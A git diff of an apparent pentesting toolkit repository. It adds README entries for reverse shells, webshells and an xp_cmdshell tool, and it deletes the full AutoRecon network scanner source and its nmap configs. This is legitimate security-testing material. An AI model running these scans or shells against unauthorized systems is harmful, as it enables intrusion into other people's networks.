diff --git a/README.md b/README.md index e8baa7a..277641a 100644 --- a/README.md +++ b/README.md @@ -7,7 +7,6 @@ This repository contains self-made and common scripts for information gathering, - gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt - ssh-check-username.py: Check if user enumeration works for ssh - [git-dumper.py](https://github.com/arthaud/git-dumper) -- [autorecon.py](https://github.com/Tib3rius/AutoRecon) - subdomainFuzz.sh: Fuzzes subdomains for a given domain ### Enumeration: Privilege Escalation & Pivoting @@ -27,6 +26,8 @@ Can be deployed on victim machines to scan the intranet. - genRevShell.py: Generates a reverse shell command (e.g. netcat, python, ...) - [php-reverse-shell.php](https://github.com/pentestmonkey/php-reverse-shell) - [p0wny-shell.php](https://github.com/flozz/p0wny-shell) +- [aspx-reverse-shell.aspx](https://github.com/borjmz/aspx-reverse-shell) +- jsp-webshell.jsp: webshell for Java servlets ### Miscellaneous - upload_file.py: Starts a local tcp server, for netcat usage @@ -35,6 +36,7 @@ Can be deployed on victim machines to scan the intranet. - sql.php: Execute sql queries passed via GET/POST - util.py: Collection of some small functions - fileserver.py: Create a temporary http server serving in-memory files +- dnsserver.py: Create a temporary dns server responding dynamically to basic DNS requests (in-memory) ### Windows - nc.exe/nc64.exe: netcat standalone binary @@ -46,3 +48,4 @@ Can be deployed on victim machines to scan the intranet. - [SharpHound.exe](https://github.com/BloodHoundAD/SharpHound3): BloodHound Ingestor - [windows-exploit-suggester.py](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - [aspx-reverse-shell.aspx](https://github.com/borjmz/aspx-reverse-shell) + - [xp_cmdshell.py](https://github.com/0xalwayslucky/pentesting-tools) (thanks to @alwayslucky) diff --git a/autorecon.py b/autorecon.py deleted file mode 100644 index e9bfd78..0000000 --- a/autorecon.py +++ /dev/null @@ -1,885 +0,0 @@ -#!/usr/bin/env python3 -# -# AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. -# -# This program can be redistributed and/or modified under the terms of the -# GNU General Public License, either version 3 of the License, or (at your -# option) any later version. -# - -import atexit -import argparse -import asyncio -import colorama -from colorama import Fore, Style -from concurrent.futures import ProcessPoolExecutor, as_completed, FIRST_COMPLETED -from datetime import datetime -import ipaddress -import os -import re -import socket -import string -import sys -import time -import toml -import termios -import appdirs -import shutil - -# Globals -verbose = 0 -nmap = "-vv --reason -Pn" -srvname = "" -heartbeat_interval = 60 -port_scan_profile = None -port_scan_profiles_config = None -service_scans_config = None -global_patterns = [] -username_wordlist = "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -password_wordlist = "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -single_target = False -only_scans_dir = False - - -def _quit(): - TERM_FLAGS = termios.tcgetattr(sys.stdin.fileno()) - termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, TERM_FLAGS) - - -def _init(): - global port_scan_profiles_config - global service_scans_config - global global_patterns - - atexit.register(_quit) - appname = "AutoRecon" - rootdir = os.path.dirname(os.path.realpath(__file__)) - default_config_dir = os.path.join(rootdir, "config") - config_dir = appdirs.user_config_dir(appname) - port_scan_profiles_config_file = os.path.join(config_dir, "port-scan-profiles.toml") - service_scans_config_file = os.path.join(config_dir, "service-scans.toml") - global_patterns_config_file = os.path.join(config_dir, "global-patterns.toml") - - # Confirm this directory exists; if not, populate it with the default configurations - if not os.path.exists(config_dir): - os.makedirs(config_dir, exist_ok=True) - shutil.copy( - os.path.join(default_config_dir, "port-scan-profiles-default.toml"), - port_scan_profiles_config_file, - ) - shutil.copy( - os.path.join(default_config_dir, "service-scans-default.toml"), - service_scans_config_file, - ) - shutil.copy( - os.path.join(default_config_dir, "global-patterns-default.toml"), - global_patterns_config_file, - ) - - - with open(port_scan_profiles_config_file, "r") as p: - try: - port_scan_profiles_config = toml.load(p) - - if len(port_scan_profiles_config) == 0: - fail( - "There do not appear to be any port scan profiles configured in the {port_scan_profiles_config_file} config file." - ) - - except toml.decoder.TomlDecodeError as e: - fail( - "Error: Couldn't parse {port_scan_profiles_config_file} config file. Check syntax and duplicate tags." - ) - - with open(service_scans_config_file, "r") as c: - try: - service_scans_config = toml.load(c) - except toml.decoder.TomlDecodeError as e: - fail( - "Error: Couldn't parse service-scans.toml config file. Check syntax and duplicate tags." - ) - - with open(global_patterns_config_file, "r") as p: - try: - global_patterns = toml.load(p) - if "pattern" in global_patterns: - global_patterns = global_patterns["pattern"] - else: - global_patterns = [] - except toml.decoder.TomlDecodeError as e: - fail( - "Error: Couldn't parse global-patterns.toml config file. Check syntax and duplicate tags." - ) - - if "username_wordlist" in service_scans_config: - if isinstance(service_scans_config["username_wordlist"], str): - username_wordlist = service_scans_config["username_wordlist"] - - if "password_wordlist" in service_scans_config: - if isinstance(service_scans_config["password_wordlist"], str): - password_wordlist = service_scans_config["password_wordlist"] - - -def e(*args, frame_index=1, **kvargs): - frame = sys._getframe(frame_index) - - vals = {} - - vals.update(frame.f_globals) - vals.update(frame.f_locals) - vals.update(kvargs) - - return string.Formatter().vformat(' '.join(args), args, vals) - -def cprint(*args, color=Fore.RESET, char='*', sep=' ', end='\n', frame_index=1, file=sys.stdout, **kvargs): - frame = sys._getframe(frame_index) - - vals = { - 'bgreen': Fore.GREEN + Style.BRIGHT, - 'bred': Fore.RED + Style.BRIGHT, - 'bblue': Fore.BLUE + Style.BRIGHT, - 'byellow': Fore.YELLOW + Style.BRIGHT, - 'bmagenta': Fore.MAGENTA + Style.BRIGHT, - - 'green': Fore.GREEN, - 'red': Fore.RED, - 'blue': Fore.BLUE, - 'yellow': Fore.YELLOW, - 'magenta': Fore.MAGENTA, - - 'bright': Style.BRIGHT, - 'srst': Style.NORMAL, - 'crst': Fore.RESET, - 'rst': Style.NORMAL + Fore.RESET - } - - vals.update(frame.f_globals) - vals.update(frame.f_locals) - vals.update(kvargs) - - unfmt = '' - if char is not None: - unfmt += color + '[' + Style.BRIGHT + char + Style.NORMAL + ']' + Fore.RESET + sep - unfmt += sep.join(args) - - fmted = unfmt - - for attempt in range(10): - try: - fmted = string.Formatter().vformat(unfmt, args, vals) - break - except KeyError as err: - key = err.args[0] - unfmt = unfmt.replace('{' + key + '}', '{{' + key + '}}') - - print(fmted, sep=sep, end=end, file=file) - -def debug(*args, color=Fore.BLUE, sep=' ', end='\n', file=sys.stdout, **kvargs): - if verbose >= 2: - cprint(*args, color=color, char='-', sep=sep, end=end, file=file, frame_index=2, **kvargs) - -def info(*args, sep=' ', end='\n', file=sys.stdout, **kvargs): - cprint(*args, color=Fore.GREEN, char='*', sep=sep, end=end, file=file, frame_index=2, **kvargs) - -def warn(*args, sep=' ', end='\n', file=sys.stderr, **kvargs): - cprint(*args, color=Fore.YELLOW, char='!', sep=sep, end=end, file=file, frame_index=2, **kvargs) - -def error(*args, sep=' ', end='\n', file=sys.stderr, **kvargs): - cprint(*args, color=Fore.RED, char='!', sep=sep, end=end, file=file, frame_index=2, **kvargs) - -def fail(*args, sep=' ', end='\n', file=sys.stderr, **kvargs): - cprint(*args, color=Fore.RED, char='!', sep=sep, end=end, file=file, frame_index=2, **kvargs) - exit(-1) - -def calculate_elapsed_time(start_time): - elapsed_seconds = round(time.time() - start_time) - - m, s = divmod(elapsed_seconds, 60) - h, m = divmod(m, 60) - - elapsed_time = [] - if h == 1: - elapsed_time.append(str(h) + ' hour') - elif h > 1: - elapsed_time.append(str(h) + ' hours') - - if m == 1: - elapsed_time.append(str(m) + ' minute') - elif m > 1: - elapsed_time.append(str(m) + ' minutes') - - if s == 1: - elapsed_time.append(str(s) + ' second') - elif s > 1: - elapsed_time.append(str(s) + ' seconds') - else: - elapsed_time.append('less than a second') - - return ', '.join(elapsed_time) - - -async def read_stream(stream, target, tag='?', patterns=[], color=Fore.BLUE): - address = target.address - while True: - line = "" - try: - line = await stream.readline() - except ValueError: - continue - - if line: - line = str(line.rstrip(), 'utf8', 'ignore') - debug(color + '[' + Style.BRIGHT + address + ' ' + tag + Style.NORMAL + '] ' + Fore.RESET + '{line}', color=color) - - for p in global_patterns: - matches = re.findall(p['pattern'], line) - if 'description' in p: - for match in matches: - if verbose >= 1: - info('Task {bgreen}{tag}{rst} on {byellow}{address}{rst} - {bmagenta}' + p['description'].replace('{match}', '{bblue}{match}{crst}{bmagenta}') + '{rst}') - async with target.lock: - with open(os.path.join(target.scandir, '_patterns.log'), 'a') as file: - file.writelines(e('{tag} - ' + p['description'] + '\n\n')) - else: - for match in matches: - if verbose >= 1: - info('Task {bgreen}{tag}{rst} on {byellow}{address}{rst} - {bmagenta}Matched Pattern: {bblue}{match}{rst}') - async with target.lock: - with open(os.path.join(target.scandir, '_patterns.log'), 'a') as file: - file.writelines(e('{tag} - Matched Pattern: {match}\n\n')) - - for p in patterns: - matches = re.findall(p['pattern'], line) - if 'description' in p: - for match in matches: - if verbose >= 1: - info('Task {bgreen}{tag}{rst} on {byellow}{address}{rst} - {bmagenta}' + p['description'].replace('{match}', '{bblue}{match}{crst}{bmagenta}') + '{rst}') - async with target.lock: - with open(os.path.join(target.scandir, '_patterns.log'), 'a') as file: - file.writelines(e('{tag} - ' + p['description'] + '\n\n')) - else: - for match in matches: - if verbose >= 1: - info('Task {bgreen}{tag}{rst} on {byellow}{address}{rst} - {bmagenta}Matched Pattern: {bblue}{match}{rst}') - async with target.lock: - with open(os.path.join(target.scandir, '_patterns.log'), 'a') as file: - file.writelines(e('{tag} - Matched Pattern: {match}\n\n')) - else: - break - -async def run_cmd(semaphore, cmd, target, tag='?', patterns=[]): - async with semaphore: - address = target.address - scandir = target.scandir - - info('Running task {bgreen}{tag}{rst} on {byellow}{address}{rst}' + (' with {bblue}{cmd}{rst}' if verbose >= 1 else '')) - - async with target.lock: - with open(os.path.join(scandir, '_commands.log'), 'a') as file: - file.writelines(e('{cmd}\n\n')) - - start_time = time.time() - process = await asyncio.create_subprocess_shell(cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, executable='/bin/bash') - async with target.lock: - target.running_tasks.append(tag) - - await asyncio.wait([ - read_stream(process.stdout, target, tag=tag, patterns=patterns), - read_stream(process.stderr, target, tag=tag, patterns=patterns, color=Fore.RED) - ]) - - await process.wait() - async with target.lock: - target.running_tasks.remove(tag) - elapsed_time = calculate_elapsed_time(start_time) - - if process.returncode != 0: - error('Task {bred}{tag}{rst} on {byellow}{address}{rst} returned non-zero exit code: {process.returncode}') - async with target.lock: - with open(os.path.join(scandir, '_errors.log'), 'a') as file: - file.writelines(e('[*] Task {tag} returned non-zero exit code: {process.returncode}. Command: {cmd}\n')) - else: - info('Task {bgreen}{tag}{rst} on {byellow}{address}{rst} finished successfully in {elapsed_time}') - - return {'returncode': process.returncode, 'name': 'run_cmd'} - -async def parse_port_scan(stream, tag, target, pattern): - address = target.address - ports = [] - - while True: - line = await stream.readline() - if line: - line = str(line.rstrip(), 'utf8', 'ignore') - debug(Fore.BLUE + '[' + Style.BRIGHT + address + ' ' + tag + Style.NORMAL + '] ' + Fore.RESET + '{line}', color=Fore.BLUE) - - parse_match = re.search(pattern, line) - if parse_match: - ports.append(parse_match.group('port')) - - - for p in global_patterns: - matches = re.findall(p['pattern'], line) - if 'description' in p: - for match in matches: - if verbose >= 1: - info('Task {bgreen}{tag}{rst} on {byellow}{address}{rst} - {bmagenta}' + p['description'].replace('{match}', '{bblue}{match}{crst}{bmagenta}') + '{rst}') - async with target.lock: - with open(os.path.join(target.scandir, '_patterns.log'), 'a') as file: - file.writelines(e('{tag} - ' + p['description'] + '\n\n')) - else: - for match in matches: - if verbose >= 1: - info('Task {bgreen}{tag}{rst} on {byellow}{address}{rst} - {bmagenta}Matched Pattern: {bblue}{match}{rst}') - async with target.lock: - with open(os.path.join(target.scandir, '_patterns.log'), 'a') as file: - file.writelines(e('{tag} - Matched Pattern: {match}\n\n')) - else: - break - - return ports - -async def parse_service_detection(stream, tag, target, pattern): - address = target.address - services = [] - - while True: - line = await stream.readline() - if line: - line = str(line.rstrip(), 'utf8', 'ignore') - debug(Fore.BLUE + '[' + Style.BRIGHT + address + ' ' + tag + Style.NORMAL + '] ' + Fore.RESET + '{line}', color=Fore.BLUE) - - parse_match = re.search(pattern, line) - if parse_match: - services.append((parse_match.group('protocol').lower(), int(parse_match.group('port')), parse_match.group('service'))) - - for p in global_patterns: - matches = re.findall(p['pattern'], line) - if 'description' in p: - for match in matches: - if verbose >= 1: - info('Task {bgreen}{tag}{rst} on {byellow}{address}{rst} - {bmagenta}' + p['description'].replace('{match}', '{bblue}{match}{crst}{bmagenta}') + '{rst}') - async with target.lock: - with open(os.path.join(target.scandir, '_patterns.log'), 'a') as file: - file.writelines(e('{tag} - ' + p['description'] + '\n\n')) - else: - for match in matches: - if verbose >= 1: - info('Task {bgreen}{tag}{rst} on {byellow}{address}{rst} - {bmagenta}Matched Pattern: {bblue}{match}{rst}') - async with target.lock: - with open(os.path.join(target.scandir, '_patterns.log'), 'a') as file: - file.writelines(e('{tag} - Matched Pattern: {match}\n\n')) - else: - break - - return services - -async def run_portscan(semaphore, tag, target, service_detection, port_scan=None): - async with semaphore: - - address = target.address - scandir = target.scandir - nmap_extra = nmap - - ports = '' - if port_scan is not None: - command = e(port_scan[0]) - pattern = port_scan[1] - - info('Running port scan {bgreen}{tag}{rst} on {byellow}{address}{rst}' + (' with {bblue}{command}{rst}' if verbose >= 1 else '')) - - async with target.lock: - with open(os.path.join(scandir, '_commands.log'), 'a') as file: - file.writelines(e('{command}\n\n')) - - start_time = time.time() - process = await asyncio.create_subprocess_shell(command, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, executable='/bin/bash') - async with target.lock: - target.running_tasks.append(tag) - - output = [ - parse_port_scan(process.stdout, tag, target, pattern), - read_stream(process.stderr, target, tag=tag, color=Fore.RED) - ] - - results = await asyncio.gather(*output) - - await process.wait() - async with target.lock: - target.running_tasks.remove(tag) - elapsed_time = calculate_elapsed_time(start_time) - - if process.returncode != 0: - error('Port scan {bred}{tag}{rst} on {byellow}{address}{rst} returned non-zero exit code: {process.returncode}') - async with target.lock: - with open(os.path.join(scandir, '_errors.log'), 'a') as file: - file.writelines(e('[*] Port scan {tag} returned non-zero exit code: {process.returncode}. Command: {command}\n')) - return {'returncode': process.returncode} - else: - info('Port scan {bgreen}{tag}{rst} on {byellow}{address}{rst} finished successfully in {elapsed_time}') - - ports = results[0] - if len(ports) == 0: - return {'returncode': -1} - - ports = ','.join(ports) - - command = e(service_detection[0]) - pattern = service_detection[1] - - info('Running service detection {bgreen}{tag}{rst} on {byellow}{address}{rst}' + (' with {bblue}{command}{rst}' if verbose >= 1 else '')) - - async with target.lock: - with open(os.path.join(scandir, '_commands.log'), 'a') as file: - file.writelines(e('{command}\n\n')) - - start_time = time.time() - process = await asyncio.create_subprocess_shell(command, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, executable='/bin/bash') - async with target.lock: - target.running_tasks.append(tag) - - output = [ - parse_service_detection(process.stdout, tag, target, pattern), - read_stream(process.stderr, target, tag=tag, color=Fore.RED) - ] - - results = await asyncio.gather(*output) - - await process.wait() - async with target.lock: - target.running_tasks.remove(tag) - elapsed_time = calculate_elapsed_time(start_time) - - if process.returncode != 0: - error('Service detection {bred}{tag}{rst} on {byellow}{address}{rst} returned non-zero exit code: {process.returncode}') - async with target.lock: - with open(os.path.join(scandir, '_errors.log'), 'a') as file: - file.writelines(e('[*] Service detection {tag} returned non-zero exit code: {process.returncode}. Command: {command}\n')) - else: - info('Service detection {bgreen}{tag}{rst} on {byellow}{address}{rst} finished successfully in {elapsed_time}') - - services = results[0] - - return {'returncode': process.returncode, 'name': 'run_portscan', 'services': services} - -async def start_heartbeat(target, period=60): - while True: - await asyncio.sleep(period) - async with target.lock: - tasks = target.running_tasks - count = len(tasks) - - tasks_list = '' - if verbose >= 1: - tasks_list = ': {bgreen}' + ', '.join(tasks) + '{rst}' - - current_time = datetime.now().strftime('%H:%M:%S') - - if count > 1: - info('{bgreen}[{current_time}]{rst} - There are {byellow}{count}{rst} tasks still running on {byellow}{target.address}{rst}' + tasks_list) - elif count == 1: - info('{bgreen}[{current_time}]{rst} - There is {byellow}1{rst} task still running on {byellow}{target.address}{rst}' + tasks_list) - -async def scan_services(loop, semaphore, target): - address = target.address - scandir = target.scandir - pending = [] - - heartbeat = loop.create_task(start_heartbeat(target, period=heartbeat_interval)) - - for profile in port_scan_profiles_config: - if profile == port_scan_profile: - for scan in port_scan_profiles_config[profile]: - service_detection = (port_scan_profiles_config[profile][scan]['service-detection']['command'], port_scan_profiles_config[profile][scan]['service-detection']['pattern']) - if 'port-scan' in port_scan_profiles_config[profile][scan]: - port_scan = (port_scan_profiles_config[profile][scan]['port-scan']['command'], port_scan_profiles_config[profile][scan]['port-scan']['pattern']) - pending.append(run_portscan(semaphore, scan, target, service_detection, port_scan)) - else: - pending.append(run_portscan(semaphore, scan, target, service_detection)) - break - - services = [] - - while True: - if not pending: - heartbeat.cancel() - break - - done, pending = await asyncio.wait(pending, return_when=FIRST_COMPLETED) - - for task in done: - result = task.result() - - if result['returncode'] == 0: - if result['name'] == 'run_portscan': - for service_tuple in result['services']: - if service_tuple not in services: - services.append(service_tuple) - else: - continue - - protocol = service_tuple[0] - port = service_tuple[1] - service = service_tuple[2] - - info('Found {bmagenta}{service}{rst} on {bmagenta}{protocol}/{port}{rst} on target {byellow}{address}{rst}') - - if not only_scans_dir: - with open(os.path.join(target.reportdir, 'notes.txt'), 'a') as file: - file.writelines(e('[*] {service} found on {protocol}/{port}.\n\n\n\n')) - - if protocol == 'udp': - nmap_extra = nmap + " -sU" - else: - nmap_extra = nmap - - secure = True if 'ssl' in service or 'tls' in service else False - - # Special cases for HTTP. - scheme = 'https' if 'https' in service or 'ssl' in service or 'tls' in service else 'http' - - if service.startswith('ssl/') or service.startswith('tls/'): - service = service[4:] - - for service_scan in service_scans_config: - # Skip over configurable variables since the python toml parser cannot iterate over tables only. - if service_scan in ['username_wordlist', 'password_wordlist']: - continue - - ignore_service = False - if 'ignore-service-names' in service_scans_config[service_scan]: - for ignore_service_name in service_scans_config[service_scan]['ignore-service-names']: - if re.search(ignore_service_name, service): - ignore_service = True - break - - if ignore_service: - continue - - matched_service = False - - if 'service-names' in service_scans_config[service_scan]: - for service_name in service_scans_config[service_scan]['service-names']: - if re.search(service_name, service): - matched_service = True - break - - if not matched_service: - continue - - if 'manual' in service_scans_config[service_scan]: - heading = False - with open(os.path.join(scandir, '_manual_commands.txt'), 'a') as file: - for manual in service_scans_config[service_scan]['manual']: - if 'description' in manual: - if not heading: - file.writelines(e('[*] {service} on {protocol}/{port}\n\n')) - heading = True - description = manual['description'] - file.writelines(e('\t[-] {description}\n\n')) - if 'commands' in manual: - if not heading: - file.writelines(e('[*] {service} on {protocol}/{port}\n\n')) - heading = True - for manual_command in manual['commands']: - manual_command = e(manual_command) - file.writelines('\t\t' + e('{manual_command}\n\n')) - if heading: - file.writelines('\n') - - if 'scan' in service_scans_config[service_scan]: - for scan in service_scans_config[service_scan]['scan']: - - if 'name' in scan: - name = scan['name'] - if 'command' in scan: - tag = e('{protocol}/{port}/{name}') - command = scan['command'] - - if 'ports' in scan: - port_match = False - - if protocol == 'tcp': - if 'tcp' in scan['ports']: - for tcp_port in scan['ports']['tcp']: - if port == tcp_port: - port_match = True - break - elif protocol == 'udp': - if 'udp' in scan['ports']: - for udp_port in scan['ports']['udp']: - if port == udp_port: - port_match = True - break - - if port_match == False: - warn(Fore.YELLOW + '[' + Style.BRIGHT + tag + Style.NORMAL + '] Scan cannot be run against {protocol} port {port}. Skipping.' + Fore.RESET) - continue - - if 'run_once' in scan and scan['run_once'] == True: - scan_tuple = (name,) - if scan_tuple in target.scans: - warn(Fore.YELLOW + '[' + Style.BRIGHT + tag + ' on ' + address + Style.NORMAL + '] Scan should only be run once and it appears to have already been queued. Skipping.' + Fore.RESET) - continue - else: - target.scans.append(scan_tuple) - else: - scan_tuple = (protocol, port, service, name) - if scan_tuple in target.scans: - warn(Fore.YELLOW + '[' + Style.BRIGHT + tag + ' on ' + address + Style.NORMAL + '] Scan appears to have already been queued, but it is not marked as run_once in service-scans.toml. Possible duplicate tag? Skipping.' + Fore.RESET) - continue - else: - target.scans.append(scan_tuple) - - patterns = [] - if 'pattern' in scan: - patterns = scan['pattern'] - - pending.add(asyncio.ensure_future(run_cmd(semaphore, e(command), target, tag=tag, patterns=patterns))) - -def scan_host(target, concurrent_scans, outdir): - start_time = time.time() - info('Scanning target {byellow}{target.address}{rst}') - - if single_target: - basedir = os.path.abspath(outdir) - else: - basedir = os.path.abspath(os.path.join(outdir, target.address + srvname)) - target.basedir = basedir - os.makedirs(basedir, exist_ok=True) - - if not only_scans_dir: - exploitdir = os.path.abspath(os.path.join(basedir, 'exploit')) - os.makedirs(exploitdir, exist_ok=True) - - lootdir = os.path.abspath(os.path.join(basedir, 'loot')) - os.makedirs(lootdir, exist_ok=True) - - reportdir = os.path.abspath(os.path.join(basedir, 'report')) - target.reportdir = reportdir - os.makedirs(reportdir, exist_ok=True) - - open(os.path.abspath(os.path.join(reportdir, 'local.txt')), 'a').close() - open(os.path.abspath(os.path.join(reportdir, 'proof.txt')), 'a').close() - - screenshotdir = os.path.abspath(os.path.join(reportdir, 'screenshots')) - os.makedirs(screenshotdir, exist_ok=True) - - scandir = os.path.abspath(os.path.join(basedir, 'scans')) - target.scandir = scandir - os.makedirs(scandir, exist_ok=True) - - os.makedirs(os.path.abspath(os.path.join(scandir, 'xml')), exist_ok=True) - - # Use a lock when writing to specific files that may be written to by other asynchronous functions. - target.lock = asyncio.Lock() - - # Get event loop for current process. - loop = asyncio.get_event_loop() - - # Create a semaphore to limit number of concurrent scans. - semaphore = asyncio.Semaphore(concurrent_scans) - - try: - loop.run_until_complete(scan_services(loop, semaphore, target)) - elapsed_time = calculate_elapsed_time(start_time) - info('Finished scanning target {byellow}{target.address}{rst} in {elapsed_time}') - except KeyboardInterrupt: - sys.exit(1) - -class Target: - def __init__(self, address): - self.address = address - self.basedir = '' - self.reportdir = '' - self.scandir = '' - self.scans = [] - self.lock = None - self.running_tasks = [] - - - -def main(): - global single_target - global only_scans_dir - global port_scan_profile - global heartbeat_interval - global nmap - global srvname - global verbose - - _init() - parser = argparse.ArgumentParser(description='Network reconnaissance tool to port scan and automatically enumerate services found on multiple targets.') - parser.add_argument('targets', action='store', help='IP addresses (e.g. 10.0.0.1), CIDR notation (e.g. 10.0.0.1/24), or resolvable hostnames (e.g. foo.bar) to scan.', nargs="*") - parser.add_argument('-t', '--targets', action='store', type=str, default='', dest='target_file', help='Read targets from file.') - parser.add_argument('-ct', '--concurrent-targets', action='store', metavar='', type=int, default=5, help='The maximum number of target hosts to scan concurrently. Default: %(default)s') - parser.add_argument('-cs', '--concurrent-scans', action='store', metavar='', type=int, default=10, help='The maximum number of scans to perform per target host. Default: %(default)s') - parser.add_argument('--profile', action='store', default='default', dest='profile_name', help='The port scanning profile to use (defined in port-scan-profiles.toml). Default: %(default)s') - parser.add_argument('-o', '--output', action='store', default='results', dest='output_dir', help='The output directory for results. Default: %(default)s') - parser.add_argument('--single-target', action='store_true', default=False, help='Only scan a single target. A directory named after the target will not be created. Instead, the directory structure will be created within the output directory. Default: false') - parser.add_argument('--only-scans-dir', action='store_true', default=False, help='Only create the "scans" directory for results. Other directories (e.g. exploit, loot, report) will not be created. Default: false') - parser.add_argument('--heartbeat', action='store', type=int, default=60, help='Specifies the heartbeat interval (in seconds) for task status messages. Default: %(default)s') - nmap_group = parser.add_mutually_exclusive_group() - nmap_group.add_argument('--nmap', action='store', default='-vv --reason -Pn', help='Override the {nmap_extra} variable in scans. Default: %(default)s') - nmap_group.add_argument('--nmap-append', action='store', default='', help='Append to the default {nmap_extra} variable in scans.') - parser.add_argument('-v', '--verbose', action='count', default=0, help='Enable verbose output. Repeat for more verbosity.') - parser.add_argument('--disable-sanity-checks', action='store_true', default=False, help='Disable sanity checks that would otherwise prevent the scans from running. Default: false') - parser.error = lambda s: fail(s[0].upper() + s[1:]) - args = parser.parse_args() - - single_target = args.single_target - only_scans_dir = args.only_scans_dir - - errors = False - - if args.concurrent_targets <= 0: - error('Argument -ch/--concurrent-targets: must be at least 1.') - errors = True - - concurrent_scans = args.concurrent_scans - - if concurrent_scans <= 0: - error('Argument -ct/--concurrent-scans: must be at least 1.') - errors = True - - port_scan_profile = args.profile_name - - found_scan_profile = False - for profile in port_scan_profiles_config: - if profile == port_scan_profile: - found_scan_profile = True - for scan in port_scan_profiles_config[profile]: - if 'service-detection' not in port_scan_profiles_config[profile][scan]: - error('The {profile}.{scan} scan does not have a defined service-detection section. Every scan must at least have a service-detection section defined with a command and a corresponding pattern that extracts the protocol (TCP/UDP), port, and service from the result.') - errors = True - else: - if 'command' not in port_scan_profiles_config[profile][scan]['service-detection']: - error('The {profile}.{scan}.service-detection section does not have a command defined. Every service-detection section must have a command and a corresponding pattern that extracts the protocol (TCP/UDP), port, and service from the results.') - errors = True - else: - if '{ports}' in port_scan_profiles_config[profile][scan]['service-detection']['command'] and 'port-scan' not in port_scan_profiles_config[profile][scan]: - error('The {profile}.{scan}.service-detection command appears to reference a port list but there is no port-scan section defined in {profile}.{scan}. Define a port-scan section with a command and corresponding pattern that extracts port numbers from the result, or replace the reference with a static list of ports.') - errors = True - - if 'pattern' not in port_scan_profiles_config[profile][scan]['service-detection']: - error('The {profile}.{scan}.service-detection section does not have a pattern defined. Every service-detection section must have a command and a corresponding pattern that extracts the protocol (TCP/UDP), port, and service from the results.') - errors = True - else: - if not all(x in port_scan_profiles_config[profile][scan]['service-detection']['pattern'] for x in ['(?P', '(?P', '(?P']): - error('The {profile}.{scan}.service-detection pattern does not contain one or more of the following matching groups: port, protocol, service. Ensure that all three of these matching groups are defined and capture the relevant data, e.g. (?P\d+)') - errors = True - - if 'port-scan' in port_scan_profiles_config[profile][scan]: - if 'command' not in port_scan_profiles_config[profile][scan]['port-scan']: - error('The {profile}.{scan}.port-scan section does not have a command defined. Every port-scan section must have a command and a corresponding pattern that extracts the port from the results.') - errors = True - - if 'pattern' not in port_scan_profiles_config[profile][scan]['port-scan']: - error('The {profile}.{scan}.port-scan section does not have a pattern defined. Every port-scan section must have a command and a corresponding pattern that extracts the port from the results.') - errors = True - else: - if '(?P' not in port_scan_profiles_config[profile][scan]['port-scan']['pattern']: - error('The {profile}.{scan}.port-scan pattern does not contain a port matching group. Ensure that the port matching group is defined and captures the relevant data, e.g. (?P\d+)') - errors = True - break - - if not found_scan_profile: - error('Argument --profile: must reference a port scan profile defined in {port_scan_profiles_config_file}. No such profile found: {port_scan_profile}') - errors = True - - heartbeat_interval = args.heartbeat - - nmap = args.nmap - if args.nmap_append: - nmap += " " + args.nmap_append - - outdir = args.output_dir - srvname = '' - verbose = args.verbose - - raw_targets = args.targets - targets = [] - - if len(args.target_file) > 0: - if not os.path.isfile(args.target_file): - error('The target file {args.target_file} was not found.') - sys.exit(1) - try: - with open(args.target_file, 'r') as f: - lines = f.read() - for line in lines.splitlines(): - line = line.strip() - if line.startswith('#') or len(line) == 0: continue - if line not in raw_targets: - raw_targets.append(line) - except OSError: - error('The target file {args.target_file} could not be read.') - sys.exit(1) - - for target in raw_targets: - try: - ip = str(ipaddress.ip_address(target)) - - if ip not in targets: - targets.append(ip) - except ValueError: - - try: - target_range = ipaddress.ip_network(target, strict=False) - if not args.disable_sanity_checks and target_range.num_addresses > 256: - error(target + ' contains ' + str(target_range.num_addresses) + ' addresses. Check that your CIDR notation is correct. If it is, re-run with the --disable-sanity-checks option to suppress this check.') - errors = True - else: - for ip in target_range.hosts(): - ip = str(ip) - if ip not in targets: - targets.append(ip) - except ValueError: - - try: - ip = socket.gethostbyname(target) - - if target not in targets: - targets.append(target) - except socket.gaierror: - error(target + ' does not appear to be a valid IP address, IP range, or resolvable hostname.') - errors = True - - if len(targets) == 0: - error('You must specify at least one target to scan!') - errors = True - - if single_target and len(targets) != 1: - error('You cannot provide more than one target when scanning in single-target mode.') - sys.exit(1) - - if not args.disable_sanity_checks and len(targets) > 256: - error('A total of ' + str(len(targets)) + ' targets would be scanned. If this is correct, re-run with the --disable-sanity-checks option to suppress this check.') - errors = True - - if errors: - sys.exit(1) - - with ProcessPoolExecutor(max_workers=args.concurrent_targets) as executor: - start_time = time.time() - futures = [] - - for address in targets: - target = Target(address) - futures.append(executor.submit(scan_host, target, concurrent_scans, outdir)) - - try: - for future in as_completed(futures): - future.result() - except KeyboardInterrupt: - for future in futures: - future.cancel() - executor.shutdown(wait=False) - sys.exit(1) - - elapsed_time = calculate_elapsed_time(start_time) - info('{bgreen}Finished scanning all targets in {elapsed_time}!{rst}') - - -if __name__ == '__main__': - main() diff --git a/autorecon_config/global-patterns.toml b/autorecon_config/global-patterns.toml deleted file mode 100644 index 67f6600..0000000 --- a/autorecon_config/global-patterns.toml +++ /dev/null @@ -1,8 +0,0 @@ -# Patterns defined in this file will be checked against every line of output (e.g. port scans and service scans) - -[[pattern]] -description = 'Nmap script found a potential vulnerability. ({match})' -pattern = 'State: (?:(?:LIKELY\_?)?VULNERABLE)' - -[[pattern]] -pattern = '(?i)unauthorized' diff --git a/autorecon_config/port-scan-profiles.toml b/autorecon_config/port-scan-profiles.toml deleted file mode 100644 index 31cf8ba..0000000 --- a/autorecon_config/port-scan-profiles.toml +++ /dev/null @@ -1,45 +0,0 @@ -[default] - - [default.nmap-quick] - - [default.nmap-quick.service-detection] - command = 'nmap {nmap_extra} -sV -sC --version-all -oN "{scandir}/_quick_tcp_nmap.txt" -oX "{scandir}/xml/_quick_tcp_nmap.xml" {address}' - pattern = '^(?P\d+)\/(?P(tcp|udp))(.*)open(\s*)(?P[\w\-\/]+)(\s*)(.*)$' - - 